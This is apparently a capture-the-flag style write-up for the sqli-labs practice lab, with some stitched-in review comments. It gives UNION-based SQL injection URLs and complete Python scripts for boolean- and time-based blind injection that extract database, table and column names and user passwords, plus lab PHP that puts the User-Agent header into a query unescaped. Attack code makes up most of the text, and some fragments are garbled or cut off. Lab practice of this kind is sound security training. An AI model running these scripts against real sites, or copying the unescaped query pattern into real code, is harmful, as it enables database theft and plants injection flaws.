Less-3：单引号 + 括号闭合。注入点形如 id=('…')，payload 需要先用 `')` 闭合原查询，再用 `%23`（URL 编码的 `#`）注释掉其后的语句。
"; echo 'Your Login name:'. $row['username']; echo "
"; echo 'Your Password:' .$row['password']; echo ""; } else { echo ''; print_r(mysql_error()); echo ""; }} else { echo "Please input the ID as parameter with numeric value";}>
数据表（当前库 table_schema=database()）：emails, referers, uagents, users
http://192.168.40.165/sqli-labs-master/Less-3/?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() %23
列名：user_id, first_name, last_name, user, password, avatar, id, username, password
http://192.168.40.165/sqli-labs-master/Less-3/?id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' %23
注：`-1` 使原查询无结果，union 的那一行才会被回显；`%23` 注释掉 `')` 之后的剩余语句。第二条查询只按 table_name='users' 过滤而没有限定 table_schema，所以把其它库里同名 users 表的列（user_id、first_name、last_name、user、password、avatar）也一并带出来了；加上 `and table_schema=database()` 才只得到当前库 users 表的 id、username、password。
字段值（users.username）：Dumb, Angelina, Dummy, secure, stupid, superman, batman, admin, admin1, admin2, admin3, dhakkan, admin4
http://192.168.40.165/sqli-labs-master/Less-3/?id=-1') union select 1,2,group_concat(username) from users %23
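import re
import requests

# Less-8 (boolean-based blind): when the injected condition is true the page
# renders a <font size="5"> banner, when it is false it renders nothing, so
# each probe is answered by looking for that banner.
#
# NOTE(review): the listing was cut off above this point. The ``def`` line of
# data_length() and the value of the global ``tag`` (the banner text the
# original compared the <font> text against) are not visible; the signature
# below is taken from the commented-out call in ``__main__``. The original
# parsed the page with an XPath query '//font[@size="5"]/text()' whose call
# target was lost by the page extractor; a stdlib regex stands in for it here.
BASE_URL = "http://192.168.40.165/sqli-labs-master/Less-8/?id=1' and "
FONT_RE = re.compile(r'<font[^>]*\bsize="5"[^>]*>\s*([^<]*)', re.I)


def _condition_holds(condition, echo=False):
    """Send one boolean-blind probe and report whether the banner text matches.

    :param condition: SQL boolean expression appended after ``id=1' and``
    :param echo: print the probe URL (the original printed it in data_length only)
    :return: True when the first <font size="5"> text equals the global ``tag``
    """
    global tag  # TODO confirm: defined in the part of the script cut from the source
    urls = BASE_URL + condition + "--+"
    if echo:
        print(urls)
    response = requests.get(urls).text
    match = FONT_RE.search(response)
    return bool(match) and match.group(1) == tag


def data_length(colums, table):
    """Find length(group_concat(colums)) from ``table`` by probing i = 0..999.

    The original only advanced ``i`` in the ``else`` branch, so a page that
    showed a banner whose text differed from ``tag`` re-sent the same probe
    forever; the counter now advances on every miss.

    :param colums: column name(s) fed to group_concat (spliced into the SQL)
    :param table: table name (spliced into the SQL)
    :return: the length, or None if it is not below 1000
    """
    for i in range(1000):
        cond = "length((select group_concat(" + colums + ") from " + table + "))=" + str(i)
        if _condition_holds(cond, echo=True):
            return i
    return None


def data_datail(length, colums, table):
    """Recover group_concat(colums) from ``table`` one byte at a time.

    Each position is scanned linearly over ASCII 32..127 (up to 96 requests
    per byte); a binary search on ascii() would cut that to ~7 but is left
    as-is to keep the output identical.

    :param length: value length (as returned by data_length)
    :param colums: column name(s) to group_concat
    :param table: table name
    :return: the recovered string (the original docstring promised a return
             value but the function only printed it and returned None)
    """
    data = ""
    for j in range(1, length + 1):
        for i in range(32, 128):
            cond = ("ascii(substring((select group_concat(" + colums + ") from "
                    + table + ")," + str(j) + ",1))=" + str(i))
            if _condition_holds(cond):
                data += chr(i)
                print(colums, '字段值=', data)
                break
    return data


if __name__ == '__main__':
    # Earlier steps of the same script (definitions cut from the source):
    # print(table_length())
    # print(table_name(90))
    # print(colums_length('users'))
    # print(column_name(70,'users'))
    # print(data_length('password','users'))
    print(data_datail(96, 'password', 'users'))
# (labelled "正确版" / "correct version" in the original post)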
Less-9：时间盲注 + 单引号闭合。探测 payload：`id=1' and sleep(3)--+`——页面无任何回显差异，只能靠响应是否延迟约 3 秒来判断注入语句是否被执行。
'''
@Modify Time      @Author
3 ------------ -------
4 2019/10/2 20:04 laoalo
5 ''' 6 # -*- coding:utf-8 -*- 7 import requests 8 import time 9
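url = "http://192.168.40.165/sqli-labs-master/Less-9/?id=1'"

# Every payload is of the form if(<cond>, 0, sleep(3)): the server sleeps when
# the condition is FALSE, so in each loop below the first value that makes the
# response slow is the answer (length <= i, or ascii <= asc).
#
# NOTE(review): the page extractor dropped the call targets (requests.get,
# time.time, str.format) and truncated information_schema.tables/.columns;
# they are restored here from the script's own imports and sibling functions.
SLEEP_SECONDS = 3


def _is_delayed(sql):
    """Send one probe and report whether the server slept.

    The original passed ``timeout=3`` while injecting ``sleep(3)``, so a hit
    raised requests.exceptions.ReadTimeout before the elapsed-time comparison
    ever ran. The timeout is now well above the sleep, and a timeout that still
    fires is treated as a hit instead of crashing the scan.

    :param sql: full URL including the payload
    :return: True if the request took longer than SLEEP_SECONDS
    """
    s_time = time.time()
    try:
        requests.get(url=sql, timeout=SLEEP_SECONDS * 3)
    except requests.exceptions.Timeout:
        return True
    return time.time() - s_time > SLEEP_SECONDS


def _probe_length(expr, label):
    """Find length(expr) by probing i = 1.. until the server sleeps.

    :param expr: SQL expression whose length is measured (spliced verbatim)
    :param label: prefix for the progress print
    :return: the length, or None if nothing below 10000 matched
    """
    for i in range(1, 10000):
        sql = url + " and if((select length(" + expr + "))>" + str(i) + ",0,sleep(3)) +--+"
        print(sql)
        if _is_delayed(sql):
            print(label, i)
            return i
    return None


def _probe_chars(template, length, asc_range, label):
    """Recover a string one byte at a time.

    :param template: URL with ``{num}`` (1-based position) and ``{asc}`` placeholders
    :param length: number of positions to recover
    :param asc_range: candidate ASCII codes, ascending (linear scan)
    :param label: prefix for the progress print
    :return: the recovered string
    """
    found = ''
    for num in range(1, length + 1):
        for asc in asc_range:
            if _is_delayed(template.format(num=num, asc=asc)):
                found += chr(asc)
                print(label, found)
                break
    return found


def database_length():
    """Length of database(); prints and returns it."""
    return _probe_length("database()", "数据库长:")


def database_name(database_length):
    """Name of database(); only a-z are tried, as in the original."""
    sql = url + " and if(ascii(substr((select database()),{num},1))>{asc},0,sleep(3)) +--+"
    return _probe_chars(sql, database_length, range(ord('a'), ord('z') + 1), "数据库名:")


def table_length(database_name):
    """Length of group_concat(table_name) for the given schema."""
    expr = ("(select group_concat(table_name) from information_schema.tables "
            "where table_schema='" + database_name + "')")
    return _probe_length(expr, database_name + " 中的所有数据表名长:")


def table_name(table_length, database_name):
    """All table names of the schema, '@'-separated."""
    sql = (url + " and if(ascii(substr((select group_concat(table_name separator '@') "
           "from information_schema.tables where table_schema='" + database_name +
           "'),{num},1))>{asc},0,sleep(3)) +--+")
    return _probe_chars(sql, table_length, range(32, 128), "所有的数据表名:")


def column_length(table_name, database_name):
    """Length of group_concat(column_name) for the given table and schema."""
    expr = ("(select group_concat(column_name) from information_schema.columns "
            "where table_name='" + table_name + "' and table_schema='" + database_name + "')")
    return _probe_length(expr, table_name + " 中的所有字段名长:")


def column_name(column_length, table_name, database_name):
    """All column names of the table, '@'-separated (the original printed them
    under the misleading label 所有的数据表名)."""
    sql = (url + " and if(ascii(substr((select group_concat(column_name separator '@') "
           "from information_schema.columns where table_name='" + table_name +
           "' and table_schema='" + database_name + "'),{num},1))>{asc},0,sleep(3)) +--+")
    return _probe_chars(sql, column_length, range(32, 128), "所有的字段名:")


def data_length(column_name, table_name):
    """Length of group_concat(column_name) over the table's rows."""
    expr = "(select group_concat(" + column_name + " separator '@') from " + table_name + ")"
    return _probe_length(expr, column_name + " 字段的值长:")


def data_detail(data_length, column_name, table_name):
    """All values of the column, '@'-separated."""
    sql = (url + " and if(ascii(substr((select group_concat(" + column_name +
           " separator '@') from " + table_name + "),{num},1))>{asc},0,sleep(3)) +--+")
    return _probe_chars(sql, data_length, range(32, 128), column_name + " 字段的值:")


if __name__ == '__main__':
    # Results recorded by the author against the lab instance:
    # database_length()                      # 8
    # database_name(8)                       # security
    # table_length('security')               # 29
    # table_name(29, 'security')             # emails@referers@uagents@users
    # column_length('users', 'security')     # 20
    # column_name(20, 'users', 'security')   # id@username@password
    # data_length('username', 'users')       # 91
    data_detail(91, 'username', 'users')     # Dumb@Angelina@Dummy@secure@stupid@superman@batman@admin@admin1@admin2@admin3@dhakkan@admin4

# ---------------------------------------------------------------------------
# Less-10: time-based blind with double-quote closure, probe id=1" and sleep(3)--+
# The Less-10 script that follows is the same as the above except for the
# closing quote in ``url``.
# ---------------------------------------------------------------------------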
3 ------------ -------
4 2019/10/2 16:56 laoalo 5 ''' 6 # -*- coding:utf-8 -*- 7 import requests 8 import time 9
10 url = '192.168.40.165/sqli-labs-master/Less-10/?id=1"' 11 def database_length(): 12 global url 13 for i in range(1,10000): 14 sql = url + " and if((select length(database()))>"+str(i)+",0,sleep(3)) +--+" 15 s_time = () 16 response = (url=sql,timeout=3) 17 e_time = () 18 print(sql)
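import time
import requests

# Less-15 (POST login form, single-quote closure, time-based blind). The
# injected uname is "admin' and if(<cond>, sleep(3), 1)#": the server sleeps
# when the condition is TRUE and the trailing '#' comments out the password
# part of the query, so the passwd field's value is irrelevant.
#
# NOTE(review): lines 1-11 of this listing (its imports) were cut from the
# source, so time and requests are imported here; the extractor also dropped
# backslashes in string literals ("tttt" was "\t\t\t\t", "n第" was "\n第")
# and truncated information_schema.tables/.columns, restored below.
url = "http://192.168.199.190/sqli-labs-master/Less-15/"
SLEEP_SECONDS = 3


def _elapsed(uname):
    """POST one crafted uname and return the round-trip time in seconds.

    The original measured time with an object exposing ``.seconds`` (presumably
    datetime.now()) in most functions but compared ``(e_time - s_time) > 2``
    directly in database_name(); one of the two forms must fail whichever clock
    was used (timedelta vs int, or float without ``.seconds``). Plain
    time.time() floats are used everywhere now.
    """
    print(uname)
    start = time.time()
    requests.post(url=url, data={'uname': uname, 'passwd': 'admin'})
    return time.time() - start


def database_length():
    """length(database()): the payload sleeps while length < i, so the first
    delayed i is one past the length."""
    for i in range(1, 10000):
        uname = "admin' and if ( length(database()) < %d , sleep(3) , 1)#" % (i)
        if _elapsed(uname) > 2:
            print("\t\t\t\t数据库长:", i - 1)
            return i - 1
    return None


def database_name(length):
    """database(), one byte at a time; a delay means ascii == i."""
    name = ""
    for j in range(1, length + 1):
        for i in range(32, 128):
            uname = "admin' and if (ascii (substr(database(), %d, 1))=%d, sleep(3), 1)#" % (j, i)
            if _elapsed(uname) > 2:
                name += chr(i)
                print("\t\t\t\t数据库名:", name)
                break
    return name


def table_length():
    """length(group_concat(table_name)) for the current schema."""
    for i in range(1, 10000):
        uname = ("admin' and if ( length((select group_concat(table_name) from "
                 "information_schema.tables where table_schema=database())) < %d , "
                 "sleep(3) , 1)#" % (i))
        if _elapsed(uname) > 2:
            print("\t\t\t\t所有的数据表长:", i - 1)
            return i - 1
    return None


def table_name(table_length):
    """Enumerate table names one per LIMIT offset, 1 byte at a time.

    Here a FAST reply is the hit: If(<char matches>, 1, sleep(2)). Fixes over
    the original: positions start at 1 because MySQL mid(s, 0, 1) is always ''
    so offset 0 never matched and cost 27 sleeping requests per table; when no
    character matches a position the name has ended, so the next table is
    started instead of probing all 20 positions; when the first position of a
    table has no match there is no table at that offset (the subquery is NULL)
    and enumeration stops; names are '@'-separated instead of run together.
    The alphabet is still a-z and '_' only, so a name with digits or upper-case
    letters would be cut short.

    :param table_length: highest LIMIT offset to try (offsets 0..table_length)
    :return: '@'-separated table names
    """
    char = "abcdefghijklmnopqrstuvwxyz_"
    print("start!")
    names = []
    for i in range(0, table_length + 1):
        print("\n第 %d 张表的爆破" % (i + 1))
        tablename = ""
        for j in range(1, 21):
            for ch in char:
                uname = ("admin'and If((mid((select table_name from information_schema.tables "
                         "where table_schema=database() limit %d,1),%d,1))='%s',1,sleep(2))#"
                         % (i, j, ch))
                if _elapsed(uname) < 1:
                    tablename += ch
                    print("表名:", tablename)
                    break
            else:
                break  # no character matched: end of this name
        if not tablename:
            break  # nothing at this offset: no more tables
        names.append(tablename)
    result = "@".join(names)
    print("\t\t\t\t表名:", result)
    return result


def colums_length(table_name):
    """length(group_concat(column_name)) for the given table in the current schema."""
    for i in range(1, 10000):
        uname = ("admin' and if ( length((select group_concat(column_name) from "
                 "information_schema.columns where table_name='" + table_name +
                 "' and table_schema=database())) < %d , sleep(3) , 1)#" % (i))
        if _elapsed(uname) > 2:
            print("\t\t\t\t字段长:", i - 1)
            return i - 1
    return None


def column_name(length, table_name):
    """group_concat(column_name) of the table, one byte at a time.

    NOTE(review): the source listing was truncated inside this function right
    after the timing calls; the match/append/break step is completed to mirror
    database_name().

    :param length: value length (as returned by colums_length)
    :param table_name: table to list columns of (spliced into the SQL)
    :return: the ','-separated column names
    """
    found = ""
    for j in range(1, length + 1):
        for i in range(32, 128):
            uname = ("admin' and if (ascii (substr((select group_concat(column_name) from "
                     "information_schema.columns where table_name='" + table_name +
                     "' and table_schema=database()), %d, 1))=%d, sleep(3), 1)#" % (j, i))
            if _elapsed(uname) > 2:
                found += chr(i)
                print("\t\t\t\t字段名:", found)
                break
    return found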
/**
 * Normalise one POST value before it is spliced into SQL (Less-18).
 *
 * This is the only sanitisation applied to uname/passwd. It truncates first
 * and escapes second, which is the safe order (truncating after escaping could
 * leave a dangling backslash). Note that $uagent and $IP below never pass
 * through this function: the User-Agent header is interpolated raw into the
 * INSERT into `security`.`uagents`, which is the intended injection point.
 *
 * Legacy APIs: get_magic_quotes_gpc() was removed in PHP 8.0 and
 * mysql_real_escape_string() (which needs an open mysql link) in PHP 7.0.
 *
 * @param string $value raw request value
 * @return int|string intval() of a digit-only string, otherwise the escaped
 *                    value wrapped in single quotes
 */
function check_input($value)
{
    // Cap the raw input at 20 characters before anything else looks at it.
    if (!empty($value)) {
        $value = substr($value, 0, 20);
    }

    // Undo magic_quotes escaping so the value is not escaped twice below.
    if (get_magic_quotes_gpc()) {
        $value = stripslashes($value);
    }

    // Digit-only strings become plain integers; everything else is escaped
    // and quoted so it can be dropped into the query as a string literal.
    return ctype_digit($value)
        ? intval($value)
        : "'" . mysql_real_escape_string($value) . "'";
}
// Request metadata echoed back to the client. Neither value goes through
// check_input(); $uagent is later interpolated unescaped into the INSERT
// into `security`.`uagents` (see the $insert statement below), so a crafted
// User-Agent header reaches MySQL verbatim — the Less-18 injection point.
// NOTE(review): the two bare "…" echoes rendered as empty lines in the source;
// the original file presumably emitted an HTML line break there.
$IP     = $_SERVER['REMOTE_ADDR'];
$uagent = $_SERVER['HTTP_USER_AGENT'];
echo "
";
echo 'Your IP ADDRESS is: ' . $IP;
echo "
";
//echo 'Your User Agent is: ' .$uagent;
// take the variables
41
42 if(isset($_POST['uname']) && isset($_POST['passwd']))43 {44
45 $uname = check_input($_POST['uname']);46 $passwd = check_input($_POST['passwd']);47
48
49 //logging the connection parameters to a file for analysis.50 $fp=fopen('','a');51 fwrite($fp,'User Agent:'.$uname."n");52
53 fclose($fp);54
55
56
57 $sql="SELECT me, rd FROM users WHERE me=$uname and rd=$passwd ORDER BY DESC LIMIT 0,1";58 $result1 = mysql_query($sql);59 $row1 = mysql_fetch_array($result1);60 if($row1)61 {62 echo '';63 $insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)";64 mysql_query($insert);65 //echo 'Your IP ADDRESS is: ' .$IP;66 echo "";67 //echo "
";68 echo '';69 echo 'Your User Agent is: ' .$uagent;70 echo "";71 echo "
";72 print_r(mysql_error());73 echo "
";74 echo '';75 echo "
";76
77 }

